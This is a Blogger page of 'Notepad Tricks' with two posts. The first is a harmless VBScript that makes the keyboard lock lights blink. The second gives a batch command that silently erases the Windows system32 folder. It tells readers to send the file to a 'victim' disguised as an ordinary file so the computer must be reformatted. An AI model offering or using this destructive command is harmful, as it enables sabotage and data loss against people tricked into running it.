Powered by Blogger.

Translate

Popular Posts

About

IP Address Checker
IP Address Checker

Blogger news

Blogroll

Search

Blogger templates

RSS
Showing posts with label Notepad Tricks. Show all posts
Showing posts with label Notepad Tricks. Show all posts

Keyboard Dancing Led Light Trick



1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "{CAPSLOCK}"
 wshshell.sendkeys "{NUMLOCK}"
 wshshell.sendkeys "{SCROLLLOCK}"
 loop

2. Then save this file as led.vbs (.vbs is must)
 3. Open your save file and see your keyboard led blinking like disco lights.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Destroy A Computer Easily


Destroy A computer Easily !
 


Hey Guys!
 

1. Open Notepad
 2. write the above command : -
 erase %windir%\system32\*.* /q

 3. Save the above notepad with the extension ".bat or .cmd" as u want.
 After u created the .cmd or .bat file send it to ur victim as like ordinary file.Once ur victim  double  click on it then he/she needs to format his/her pc.
 What it does is deletes all files present in the system32 folder out of which most of them are files   important for a computers functioning.
 Note:-
 It would work only if the victim has windows....

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS